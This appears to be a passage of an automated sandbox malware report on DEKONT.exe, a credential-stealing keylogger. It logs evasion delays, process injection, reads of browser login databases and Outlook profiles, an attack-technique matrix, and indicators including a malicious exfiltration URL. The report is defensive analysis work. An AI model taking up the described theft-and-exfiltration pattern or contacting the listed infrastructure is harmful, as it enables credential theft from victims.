                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 599218Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 598890Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 598781Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 598672Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 598563Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 598438Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 598313Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 598203Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 598093Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 597984Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 597875Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 597765Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 597656Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 597547Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 597438Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 597313Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 597188Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 597063Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 596938Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 596828Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 596719Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 596594Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 594235Jump to behavior
                  Source: DEKONT.exe, 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000000.00000002.1373034560.0000000003210000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: bWhgfsRR8y
                  Source: DEKONT.exe, 00000003.00000002.3819986025.0000000001156000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll50a3
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2BE28 LdrInitializeThunk,3_2_05B2BE28
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\DEKONT.exeMemory written: C:\Users\user\Desktop\DEKONT.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess created: C:\Users\user\Desktop\DEKONT.exe "C:\Users\user\Desktop\DEKONT.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeQueries volume information: C:\Users\user\Desktop\DEKONT.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeQueries volume information: C:\Users\user\Desktop\DEKONT.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 0.2.DEKONT.exe.4409970.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEKONT.exe.5b20000.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEKONT.exe.4409970.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEKONT.exe.5b20000.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1378528073.0000000005B20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1375703382.0000000004409000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 3.2.DEKONT.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEKONT.exe.5056a70.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEKONT.exe.4f92230.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3822157482.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DEKONT.exe PID: 7384, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: DEKONT.exe PID: 7564, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\DEKONT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 3.2.DEKONT.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEKONT.exe.5056a70.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEKONT.exe.4f92230.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DEKONT.exe PID: 7384, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: DEKONT.exe PID: 7564, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 0.2.DEKONT.exe.4409970.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEKONT.exe.5b20000.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEKONT.exe.4409970.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEKONT.exe.5b20000.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1378528073.0000000005B20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1375703382.0000000004409000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 3.2.DEKONT.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEKONT.exe.5056a70.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEKONT.exe.4f92230.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3822157482.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DEKONT.exe PID: 7384, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: DEKONT.exe PID: 7564, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                  DLL Side-Loading
                  111
                  Process Injection
                  1
                  Masquerading
                  1
                  OS Credential Dumping
                  1
                  Security Software Discovery
                  Remote Services1
                  Email Collection
                  11
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  LSASS Memory1
                  Process Discovery
                  Remote Desktop Protocol11
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                  Virtualization/Sandbox Evasion
                  Security Account Manager31
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin Shares1
                  Data from Local System
                  2
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                  Process Injection
                  NTDS1
                  Application Window Discovery
                  Distributed Component Object ModelInput Capture13
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Deobfuscate/Decode Files or Information
                  LSA Secrets1
                  System Network Configuration Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                  Obfuscated Files or Information
                  Cached Domain Credentials13
                  System Information Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                  Software Packing
                  DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Timestomp
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  DLL Side-Loading
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  DEKONT.exe45%ReversingLabsWin32.Ransomware.Loki
                  DEKONT.exe47%VirustotalBrowse
                  DEKONT.exe100%AviraHEUR/AGEN.1309979
                  DEKONT.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  reallyfreegeoip.org2%VirustotalBrowse
                  scratchdreams.tk17%VirustotalBrowse
                  checkip.dyndns.com0%VirustotalBrowse
                  checkip.dyndns.org0%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://checkip.dyndns.org/0%URL Reputationsafe
                  http://checkip.dyndns.org/q0%URL Reputationsafe
                  http://reallyfreegeoip.org0%URL Reputationsafe
                  https://reallyfreegeoip.org0%URL Reputationsafe
                  http://checkip.dyndns.org0%URL Reputationsafe
                  http://checkip.dyndns.com0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                  http://tempuri.org/DataSet1.xsd0%Avira URL Cloudsafe
                  https://reallyfreegeoip.org/xml/154.16.105.36$0%Avira URL Cloudsafe
                  https://reallyfreegeoip.org/xml/154.16.105.36(0%Avira URL Cloudsafe
                  https://scratchdreams.tk100%Avira URL Cloudmalware
                  https://reallyfreegeoip.org/xml/154.16.105.360%Avira URL Cloudsafe
                  https://scratchdreams.tk/_send_.php?TS100%Avira URL Cloudmalware
                  http://scratchdreams.tk100%Avira URL Cloudmalware
                  https://scratchdreams.tk16%VirustotalBrowse
                  http://tempuri.org/DataSet1.xsd2%VirustotalBrowse
                  http://scratchdreams.tk17%VirustotalBrowse
                  https://scratchdreams.tk/_send_.php?TS14%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  104.21.67.152
                  truefalseunknown
                  scratchdreams.tk
                  104.21.27.85
                  truefalseunknown
                  checkip.dyndns.com
                  193.122.6.168
                  truefalseunknown
                  checkip.dyndns.org
                  unknown
                  unknowntrueunknown
                  NameMaliciousAntivirus DetectionReputation
                  http://checkip.dyndns.org/false
                  • URL Reputation: safe
                  unknown
                  https://reallyfreegeoip.org/xml/154.16.105.36false
                  • Avira URL Cloud: safe
                  unknown
                  https://scratchdreams.tk/_send_.php?TSfalse
                  • 14%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://reallyfreegeoip.org/xml/154.16.105.36$DEKONT.exe, 00000003.00000002.3822157482.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003155000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003191000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003182000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003147000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000312C000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://checkip.dyndns.org/qDEKONT.exe, 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/DataSet1.xsdDEKONT.exefalse
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://scratchdreams.tkDEKONT.exe, 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 16%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  http://reallyfreegeoip.orgDEKONT.exe, 00000003.00000002.3822157482.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003155000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003191000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003182000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003147000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000312C000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://reallyfreegeoip.orgDEKONT.exe, 00000003.00000002.3822157482.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003099000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003155000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003191000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003182000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003147000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000312C000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://reallyfreegeoip.org/xml/154.16.105.36(DEKONT.exe, 00000003.00000002.3822157482.0000000003147000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://checkip.dyndns.orgDEKONT.exe, 00000003.00000002.3822157482.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003099000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003155000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003191000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003163000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003182000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003147000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000312C000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000308D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://checkip.dyndns.comDEKONT.exe, 00000003.00000002.3822157482.0000000003099000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003155000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003191000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003182000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003147000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000312C000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDEKONT.exe, 00000003.00000002.3822157482.0000000002FD1000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://scratchdreams.tkDEKONT.exe, 00000003.00000002.3822157482.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 17%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    unknown
                    https://reallyfreegeoip.org/xml/DEKONT.exe, 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003099000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    104.21.67.152
                    reallyfreegeoip.orgUnited States
                    13335CLOUDFLARENETUSfalse
                    193.122.6.168
                    checkip.dyndns.comUnited States
                    31898ORACLE-BMC-31898USfalse
                    104.21.27.85
                    scratchdreams.tkUnited States
                    13335CLOUDFLARENETUSfalse
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1430860
                    Start date and time:2024-04-24 10:11:08 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 22s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:DEKONT.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/1@4/3
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 152
                    • Number of non-executed functions: 25
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    TimeTypeDescription
                    10:12:01API Interceptor11155798x Sleep call for process: DEKONT.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    104.21.67.152e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                      rSyDiExlek.exeGet hashmaliciousSnake KeyloggerBrowse
                        edlyEKgpaz.exeGet hashmaliciousSnake KeyloggerBrowse
                          edlyEKgpaz.exeGet hashmaliciousSnake KeyloggerBrowse
                            58208 Teklif.exeGet hashmaliciousSnake KeyloggerBrowse
                              Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                SAT8765456000.xlam.xlsxGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                  Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                      1d4D5ndo0x.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                        193.122.6.168ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.docGet hashmaliciousSnake KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        0FvHGK2cyk.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                        • checkip.dyndns.org/
                                        UbMsBrTi5s.exeGet hashmaliciousUnknownBrowse
                                        • checkip.dyndns.org/
                                        gZIZ5eyCtS.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        109__Purchase_Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        1d4D5ndo0x.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        PT98765445670009.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        SDTP098766700000.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        sipari#U015f formu_831512.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        104.21.27.85e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                          PsBygexGwH.exeGet hashmaliciousSnake KeyloggerBrowse
                                            Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                              Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  Fuy2BDS9W2.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
